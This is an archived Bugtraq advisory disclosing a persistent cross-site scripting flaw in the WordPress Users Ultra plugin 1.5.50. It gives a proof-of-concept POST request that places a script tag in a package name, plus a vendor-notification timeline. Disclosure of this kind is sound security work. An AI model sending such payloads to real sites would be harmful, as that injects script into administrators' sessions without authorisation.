lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <201512021832.tB2IWVYl002067@sf01web1.securityfocus.com>
Date: Wed, 2 Dec 2015 18:32:31 GMT
From: pan.vagenas@...il.com
To: bugtraq@...urityfocus.com
Subject: WordPress Users Ultra Plugin [Persistence XSS]

* Exploit Title: WordPress Users Ultra Plugin [Persistence XSS]
* Discovery Date: 2015/10/20
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps


Description
================================================================================

Once a user is registered he can add new subscription packages or modify existing ones. No data sanitization is 
taking place before saving package details in DB. This allows a malicious user to include JS code in package name 
and/or package description.

PoC
================================================================================

- Send a post request to `http://vuln.site.tld/wp-admin/admin-ajax.php` with data: 
    `action=package_add_new&p_name=a<script>alert(1)</script>`
- Visit `http://vuln.site.tld/wp-admin/admin.php?page=userultra&tab=membership` as admin or go to the page that 
    contains package information at front end.

Timeline
================================================================================

2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email

Solution
================================================================================
  
No official solution yet exists.

Powered by blists - more mailing lists